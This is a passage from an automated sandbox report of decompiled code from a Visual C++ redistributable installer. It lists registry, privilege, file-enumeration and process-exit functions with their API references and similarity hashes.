                                                                          						E000137D3(__eax, "xmlutil.cpp", 0x340, 0x8007000e);
                                                                          					}
                                                                          					return _t16;
                                                                          				}
                                                                          			}







                                                                          APIs
                                                                          • SysAllocString.OLEAUT32(?), ref: 00053383
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000533B3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFree
                                                                          • String ID: xmlutil.cpp
                                                                          • API String ID: 344208780-1270936966
                                                                          • Opcode ID: 161a1470133bb6f16e5b742349f74afa390e2f616fe22f490833e1cc6f363268
                                                                          • Instruction ID: 784e043318230e28a879ff8b3226b34ef11d2770bcf1ef284f71ba3c31702a11
                                                                          • Opcode Fuzzy Hash: 161a1470133bb6f16e5b742349f74afa390e2f616fe22f490833e1cc6f363268
                                                                          • Instruction Fuzzy Hash: ECF0E935200218E7C7210E499C08FAFBBA8EF847A2F104119FD05AB210CB78DF08DAE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00051344(void* _a4, short* _a8, char _a12) {
                                                                          				signed short _t5;
                                                                          				int _t9;
                                                                          
                                                                          				_t9 = 0;
                                                                          				_t5 = RegSetValueExW(_a4, _a8, 0, 4,  &_a12, 4);
                                                                          				if(_t5 != 0) {
                                                                          					_t12 =  <=  ? _t5 : _t5 & 0x0000ffff | 0x80070000;
                                                                          					_t9 =  >=  ? 0x80004005 :  <=  ? _t5 : _t5 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "regutil.cpp", 0x372, _t9);
                                                                          				}
                                                                          				return _t9;
                                                                          			}






                                                                          APIs
                                                                          • RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,?,0001F11A,00000005,Resume,?,?,?,00000002,00000000), ref: 00051359
                                                                          Strings
                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00051347
                                                                          • regutil.cpp, xrefs: 00051381
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$regutil.cpp
                                                                          • API String ID: 3702945584-2416625845
                                                                          • Opcode ID: a089f9aed6235b97515b2661d82a1ac2373613a4677e72ccd9813f2e6fca4aef
                                                                          • Instruction ID: cc4ef71a727336e2469339bb512177df1d50aa386f940028ab2b87fcd6fccae3
                                                                          • Opcode Fuzzy Hash: a089f9aed6235b97515b2661d82a1ac2373613a4677e72ccd9813f2e6fca4aef
                                                                          • Instruction Fuzzy Hash: 0AE06D72B452357AE7305AA64C05FD77ACCDF04AA0F014021BF08EA190D2658D0082E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00050CD1() {
                                                                          				_Unknown_base(*)()* _t3;
                                                                          				intOrPtr _t4;
                                                                          				void* _t6;
                                                                          
                                                                          				_t6 = E000137D6(L"AdvApi32.dll", 0x7b644);
                                                                          				if(_t6 >= 0) {
                                                                          					_t3 = GetProcAddress( *0x7b644, "RegDeleteKeyExW");
                                                                          					_t4 =  *0x7b66c; // 0x0
                                                                          					 *0x7b670 = _t3;
                                                                          					_t5 =  ==  ? _t3 : _t4;
                                                                          					 *0x7b674 = 1;
                                                                          					 *0x7b66c =  ==  ? _t3 : _t4;
                                                                          				}
                                                                          				return _t6;
                                                                          			}







                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00050CF2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: AdvApi32.dll$RegDeleteKeyExW
                                                                          • API String ID: 190572456-850864035
                                                                          • Opcode ID: ef9f74c43018a9eb3f117a2725b48fcb164204957b9cbf4cc26b0a1fe13d7118
                                                                          • Instruction ID: 5b5847ec114477feccbee4e49359d037cb08b93a7f266b7d7f12d74ef26c1d11
                                                                          • Opcode Fuzzy Hash: ef9f74c43018a9eb3f117a2725b48fcb164204957b9cbf4cc26b0a1fe13d7118
                                                                          • Instruction Fuzzy Hash: 6DE0E6B0F45A149FE7145F75BC16B453B90AB14B197408119FB0DA62B1DF7D58808B54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 56%
                                                                          			E000B44E9(void* __edx) {
                                                                          				signed int _v8;
                                                                          				intOrPtr _v12;
                                                                          				struct _TOKEN_PRIVILEGES _v24;
                                                                          				void* _v28;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t13;
                                                                          				int _t20;
                                                                          				int _t22;
                                                                          				void* _t23;
                                                                          				int _t24;
                                                                          				signed short _t31;
                                                                          				signed short _t34;
                                                                          				signed short _t37;
                                                                          				void* _t45;
                                                                          				int _t47;
                                                                          				int _t48;
                                                                          				signed int _t60;
                                                                          
                                                                          				_t45 = __edx;
                                                                          				_t13 =  *0x11a008; // 0xf77c1860
                                                                          				_v8 = _t13 ^ _t60;
                                                                          				asm("stosd");
                                                                          				_v28 = 0;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t47 = 0;
                                                                          				if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v28) != 0) {
                                                                          					_v24.PrivilegeCount = 1;
                                                                          					_v12 = 2;
                                                                          					_t20 = LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v24.Privileges)); // executed
                                                                          					if(_t20 != 0) {
                                                                          						_t22 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0x10, 0, 0); // executed
                                                                          						if(_t22 != 0) {
                                                                          							do {
                                                                          								_t48 = 0; // executed
                                                                          								Sleep(0x3e8); // executed
                                                                          								_t23 =  *0x11aa5c(0, 0, 0, 0, 1, 0x80040002); // executed
                                                                          								if(_t23 == 0) {
                                                                          									_t48 =  <=  ? GetLastError() : _t30 & 0x0000ffff | 0x80070000;
                                                                          								}
                                                                          								_t24 = _t47;
                                                                          								_t47 = _t47 + 1;
                                                                          							} while (_t24 < 0xa && (_t48 == 0x800704f7 || _t48 == 0x80070015));
                                                                          							if(_t48 < 0) {
                                                                          								E000B37D3(_t24, "engine.cpp", 0x376, _t48);
                                                                          								_push("Failed to schedule restart.");
                                                                          								goto L13;
                                                                          							}
                                                                          						} else {
                                                                          							_t31 = GetLastError();
                                                                          							_t53 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                          							_t48 =  >=  ? 0x80004005 :  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                          							E000B37D3(0x80004005, "engine.cpp", 0x362, _t48);
                                                                          							_push("Failed to adjust token to add shutdown privileges.");
                                                                          							goto L13;
                                                                          						}
                                                                          					} else {
                                                                          						_t34 = GetLastError();
                                                                          						_t56 =  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
                                                                          						_t48 =  >=  ? 0x80004005 :  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
                                                                          						E000B37D3(0x80004005, "engine.cpp", 0x35d, _t48);
                                                                          						_push("Failed to get shutdown privilege LUID.");
                                                                          						goto L13;
                                                                          					}
                                                                          				} else {
                                                                          					_t37 = GetLastError();
                                                                          					_t59 =  <=  ? _t37 : _t37 & 0x0000ffff | 0x80070000;
                                                                          					_t48 =  >=  ? 0x80004005 :  <=  ? _t37 : _t37 & 0x0000ffff | 0x80070000;
                                                                          					E000B37D3(0x80004005, "engine.cpp", 0x356, _t48);
                                                                          					_push("Failed to get process token.");
                                                                          					L13:
                                                                          					_push(_t48);
                                                                          					E000F012F();
                                                                          				}
                                                                          				if(_v28 != 0) {
                                                                          					CloseHandle(_v28);
                                                                          				}
                                                                          				return E000DDE36(0, _v8 ^ _t60, _t45, _t47, _t48);
                                                                          			}
























                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 000B4512
                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 000B4519
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 000B4523
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 000B4573
                                                                          • GetLastError.KERNEL32 ref: 000B457D
                                                                          • CloseHandle.KERNEL32(?), ref: 000B4677
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
                                                                          • String ID: @Met$Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$user.cpp
                                                                          • API String ID: 4232854991-3888403951
                                                                          • Opcode ID: d765f38ae7c8ec5cd050d5fa42079a91881ba864bbd720486545f1235f99f35e
                                                                          • Instruction ID: e8b13eabc9c0dab0f2e8eae1a1d2eaea636e47a3344da415c716fc3c554e7583
                                                                          • Opcode Fuzzy Hash: d765f38ae7c8ec5cd050d5fa42079a91881ba864bbd720486545f1235f99f35e
                                                                          • Instruction Fuzzy Hash: DE41D472A40328ABF7206AB9DD4AFFB76D8EF04741F110125BF01F6591DA648E009AA6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000B1070(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
                                                                          				signed int _v8;
                                                                          				char* _v12;
                                                                          				char* _v16;
                                                                          				char* _v20;
                                                                          				char* _v24;
                                                                          				char* _v28;
                                                                          				char* _v32;
                                                                          				char* _v36;
                                                                          				char* _v40;
                                                                          				char* _v44;
                                                                          				WCHAR* _v48;
                                                                          				char _v52;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t24;
                                                                          				void* _t29;
                                                                          				void* _t33;
                                                                          				void* _t35;
                                                                          				void* _t40;
                                                                          				intOrPtr _t41;
                                                                          				void* _t42;
                                                                          				void* _t45;
                                                                          				intOrPtr _t46;
                                                                          				void* _t47;
                                                                          				signed int _t48;
                                                                          				void* _t49;
                                                                          				signed int _t50;
                                                                          
                                                                          				_t45 = __edx;
                                                                          				_t42 = __ecx;
                                                                          				_t24 =  *0x11a008; // 0xf77c1860
                                                                          				_v8 = _t24 ^ _t50;
                                                                          				_t41 = _a4;
                                                                          				_t46 = _a12;
                                                                          				_t49 = _t48 | 0xffffffff;
                                                                          				_v52 = 0;
                                                                          				_v48 = 0;
                                                                          				_v44 = L"cabinet.dll";
                                                                          				_v40 = L"msi.dll";
                                                                          				_v36 = L"version.dll";
                                                                          				_v32 = L"wininet.dll";
                                                                          				_v28 = L"comres.dll";
                                                                          				_v24 = L"clbcatq.dll";
                                                                          				_v20 = L"msasn1.dll";
                                                                          				_v16 = L"crypt32.dll";
                                                                          				_v12 = L"feclient.dll";
                                                                          				if(E000B33D7( &_v48, 0) >= 0) {
                                                                          					_t40 = CreateFileW(_v48, 0x80000000, 5, 0, 3, 0x80, 0); // executed
                                                                          					_t49 = _t40;
                                                                          				}
                                                                          				_t29 = E000B501B(_t46); // executed
                                                                          				_t52 = _t29;
                                                                          				if(_t29 == 0) {
                                                                          					E000B1174(_t42,  &_v44, 9);
                                                                          				} else {
                                                                          					E000B11FB();
                                                                          				}
                                                                          				_t33 = E000B508D(_t42, _t45, _t52, _t41, _t49, _t46, _a16,  &_v52); // executed
                                                                          				_t47 = _t33;
                                                                          				if(_t49 != 0xffffffff) {
                                                                          					CloseHandle(_t49);
                                                                          				}
                                                                          				if(_v48 != 0) {
                                                                          					E000F54EF(_v48);
                                                                          				}
                                                                          				_t35 =  <  ? _t47 : _v52;
                                                                          				return E000DDE36(_t41, _v8 ^ _t50, _t45, _t47, _t49);
                                                                          			}

                                                                          APIs
                                                                            • Part of subcall function 000B33D7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,00000000,00000000,?,000DAD27,00000001,00000000,?,WixBundleSourceProcessPath,00000001,?), ref: 000B33F8
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 000B10F6
                                                                            • Part of subcall function 000B1174: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,000B111A,cabinet.dll,00000009,?,?,00000000), ref: 000B1185
                                                                            • Part of subcall function 000B1174: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,000B111A,cabinet.dll,00000009,?,?,00000000), ref: 000B1190
                                                                            • Part of subcall function 000B1174: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000B119E
                                                                            • Part of subcall function 000B1174: GetLastError.KERNEL32(?,?,?,?,000B111A,cabinet.dll,00000009,?,?,00000000), ref: 000B11B9
                                                                            • Part of subcall function 000B1174: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000B11C1
                                                                            • Part of subcall function 000B1174: GetLastError.KERNEL32(?,?,?,?,000B111A,cabinet.dll,00000009,?,?,00000000), ref: 000B11D6
                                                                          • CloseHandle.KERNEL32(?,?,?,?,000FB4C0,?,cabinet.dll,00000009,?,?,00000000), ref: 000B1131
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                                          • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                          • API String ID: 3687706282-3151496603
                                                                          • Opcode ID: 2501c6169be942ef1ae92b9cf8f159e9d509981891ed686fb5db9de30c43c6cb
                                                                          • Instruction ID: 1d33145a667dd6dcd49bdc7fb9c619b6f45e2b51cf3007674be299340e55b958
                                                                          • Opcode Fuzzy Hash: 2501c6169be942ef1ae92b9cf8f159e9d509981891ed686fb5db9de30c43c6cb
                                                                          • Instruction Fuzzy Hash: C221717190020CABDB10AFA9DD45BFEBBB8EF09714F504519FA20B7292DB749904DFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 95%
                                                                          			E000C993E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				short _v38;
                                                                          				struct _WIN32_FIND_DATAW _v600;
                                                                          				char _v604;
                                                                          				char _v608;
                                                                          				WCHAR* _v612;
                                                                          				void* __ebp;
                                                                          				signed int _t39;
                                                                          				void* _t45;
                                                                          				void* _t55;
                                                                          				int _t57;
                                                                          				signed int _t60;
                                                                          				void* _t63;
                                                                          				signed int _t65;
                                                                          				void* _t68;
                                                                          				void* _t69;
                                                                          				void* _t72;
                                                                          				void* _t74;
                                                                          				void* _t75;
                                                                          				signed int _t76;
                                                                          
                                                                          				_t74 = __esi;
                                                                          				_t73 = __edi;
                                                                          				_t72 = __edx;
                                                                          				_t69 = __ecx;
                                                                          				_t68 = __ebx;
                                                                          				_t39 =  *0x11a008; // 0xf77c1860
                                                                          				_v8 = _t39 ^ _t76;
                                                                          				_v604 = 0;
                                                                          				_v612 = 0;
                                                                          				_v608 = 0;
                                                                          				E000DF670(__edi,  &_v600, 0, 0x250);
                                                                          				_t45 = E000CA189(_t69, _a4, L".unverified",  &_v604); // executed
                                                                          				if(_t45 >= 0) {
                                                                          					E000B3BC3(_t72, _v604, 7); // executed
                                                                          				}
                                                                          				if(_a4 != 0 || E000C80AE(_t72, _a8,  &_v604) < 0 || E000B2D79(_t69, _v604, L"*.*",  &_v612) < 0) {
                                                                          					L16:
                                                                          					if(_v608 != 0) {
                                                                          						E000F54EF(_v608);
                                                                          					}
                                                                          					if(_v612 != 0) {
                                                                          						E000F54EF(_v612);
                                                                          					}
                                                                          					if(_v604 != 0) {
                                                                          						E000F54EF(_v604);
                                                                          					}
                                                                          					return E000DDE36(_t68, _v8 ^ _t76, _t72, _t73, _t74);
                                                                          				} else {
                                                                          					_push(_t74);
                                                                          					_t55 = FindFirstFileW(_v612,  &_v600); // executed
                                                                          					_t75 = _t55;
                                                                          					if(_t75 == 0xffffffff) {
                                                                          						L15:
                                                                          						_pop(_t74);
                                                                          						goto L16;
                                                                          					} else {
                                                                          						goto L6;
                                                                          					}
                                                                          					do {
                                                                          						L6:
                                                                          						if((_v600.dwFileAttributes & 0x00000010) != 0) {
                                                                          							goto L13;
                                                                          						}
                                                                          						_v38 = 0;
                                                                          						_t60 = lstrlenW( &(_v600.cFileName));
                                                                          						if(_t60 <= 2) {
                                                                          							L11:
                                                                          							_t63 = E000B2D79(_t69, _v604,  &(_v600.cFileName),  &_v608);
                                                                          							_t89 = _t63;
                                                                          							if(_t63 >= 0) {
                                                                          								E000F4038(_t69, _t89, _v608);
                                                                          							}
                                                                          							goto L13;
                                                                          						}
                                                                          						_t69 = 0x2e;
                                                                          						if(_t69 !=  *((intOrPtr*)(_t76 + _t60 * 2 - 0x22c))) {
                                                                          							goto L11;
                                                                          						}
                                                                          						_t65 =  *(_t76 + _t60 * 2 - 0x22a) & 0x0000ffff;
                                                                          						_t69 = 0x52;
                                                                          						if(_t69 == _t65) {
                                                                          							goto L13;
                                                                          						}
                                                                          						_t69 = 0x72;
                                                                          						if(_t69 == _t65) {
                                                                          							goto L13;
                                                                          						}
                                                                          						goto L11;
                                                                          						L13:
                                                                          						_t57 = FindNextFileW(_t75,  &_v600); // executed
                                                                          					} while (_t57 != 0);
                                                                          					FindClose(_t75);
                                                                          					goto L15;
                                                                          				}
                                                                          			}
                                                                          0x000c9a7a
                                                                          0x000c9a7f
                                                                          0x00000000
                                                                          0x000c9a7f

                                                                          APIs
                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,*.*,?,?,?,00000000,.unverified,?), ref: 000C99ED
                                                                          • lstrlenW.KERNEL32(?), ref: 000C9A14
                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 000C9A74
                                                                          • FindClose.KERNEL32(00000000), ref: 000C9A7F
                                                                            • Part of subcall function 000B3BC3: GetFileAttributesW.KERNELBASE(?,?,?,?,00000000,?,?), ref: 000B3C3F
                                                                            • Part of subcall function 000B3BC3: GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 000B3C52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                                          • String ID: *.*$.unverified
                                                                          • API String ID: 457978746-2528915496
                                                                          • Opcode ID: 7ee33b4174eea7c24f8bff0639dd6e0c83518a9d9cc06101ab6cbccc95634933
                                                                          • Instruction ID: d4a8676515c13c3549da00eb400aeea4ff6dd9a8e419992e66bc89fcf7fb8978
                                                                          • Opcode Fuzzy Hash: 7ee33b4174eea7c24f8bff0639dd6e0c83518a9d9cc06101ab6cbccc95634933
                                                                          • Instruction Fuzzy Hash: B341913190062CAEDB60AB60DC0DFEE77B8AF44305F5001A9E908E10A1EB758EC4DF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000E4812(int _a4) {
                                                                          				void* _t14;
                                                                          				void* _t15;
                                                                          				void* _t17;
                                                                          				void* _t18;
                                                                          				void* _t19;
                                                                          
                                                                          				if(E000E8A73(_t14, _t15, _t17, _t18, _t19) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                                          					TerminateProcess(GetCurrentProcess(), _a4);
                                                                          				}
                                                                          				E000E4897(_t15, _a4);
                                                                          				ExitProcess(_a4);
                                                                          			}








                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000000,?,000E47E8,00000000,00117CF8,0000000C,000E493F,00000000,00000002,00000000), ref: 000E4833
                                                                          • TerminateProcess.KERNEL32(00000000,?,000E47E8,00000000,00117CF8,0000000C,000E493F,00000000,00000002,00000000), ref: 000E483A
                                                                          • ExitProcess.KERNEL32 ref: 000E484C
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
                                                                          • Opcode ID: d5dafb76e87928069972e38aa495fa0c6d18c286d15c489112d4be81377bb688
                                                                          • Instruction ID: bf903da6175051d1a840ed4995baf4111f70ada85d5f9d7431d966a9df097fee
                                                                          • Opcode Fuzzy Hash: d5dafb76e87928069972e38aa495fa0c6d18c286d15c489112d4be81377bb688
                                                                          • Instruction Fuzzy Hash: 26E04631000288AFDF416F12DE09AAE3F69FB40341F040024F818AB532CF39EC42EB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000F4315(WCHAR* _a4, signed char* _a8) {
                                                                          				signed int _v8;
                                                                          				struct _WIN32_FIND_DATAW _v600;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t10;
                                                                          				void* _t15;
                                                                          				signed char _t19;
                                                                          				signed char* _t20;
                                                                          				void* _t23;
                                                                          				void* _t24;
                                                                          				signed int _t27;
                                                                          
                                                                          				_t10 =  *0x11a008; // 0xf77c1860
                                                                          				_v8 = _t10 ^ _t27;
                                                                          				_t20 = _a8;
                                                                          				_t26 = _a4;
                                                                          				_t24 = 0;
                                                                          				E000DF670(0,  &_v600, 0, 0x250);
                                                                          				_t15 = FindFirstFileW(_a4,  &_v600); // executed
                                                                          				if(_t15 != 0xffffffff) {
                                                                          					FindClose(_t15);
                                                                          					_t19 = _v600.dwFileAttributes;
                                                                          					if((_t19 & 0x00000010) == 0) {
                                                                          						if(_t20 != 0) {
                                                                          							 *_t20 = _t19;
                                                                          						}
                                                                          						_t24 = 1;
                                                                          					}
                                                                          				}
                                                                          				return E000DDE36(_t20, _v8 ^ _t27, _t23, _t24, _t26);
                                                                          			}
















                                                                          APIs
                                                                          • FindFirstFileW.KERNELBASE(?,?,00000000,00000000,?), ref: 000F4350
                                                                          • FindClose.KERNEL32(00000000), ref: 000F435C
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 6c91e7099e8a2c6c3ad8650c4a2d956b1b699d95cc3373aa80a585514361f73c
                                                                          • Instruction ID: 2549b3657b1d7cf4cdab75ca407e5835e884679eb17a647ab8985fa9f5a38cf5
                                                                          • Opcode Fuzzy Hash: 6c91e7099e8a2c6c3ad8650c4a2d956b1b699d95cc3373aa80a585514361f73c
                                                                          • Instruction Fuzzy Hash: 0B01867160020CABDB20EF69DD899BBB7ACEBC5315F400166F958D7641D7349E498B60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000DE773() {
                                                                          				_Unknown_base(*)()* _t1;
                                                                          
                                                                          				_t1 = SetUnhandledExceptionFilter(E000DE77F); // executed
                                                                          				return _t1;
                                                                          			}




                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_0002E77F,000DDEF8), ref: 000DE778
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 91961c8120eddbfad48e5d8cba0f6eebf39225c92b7e81d283dbaa2cb8509e65
                                                                          • Instruction ID: 0df5e58b0b9a50af0c5a0baf86660c7b8447db40adc81d4e4ea01233a5546f50
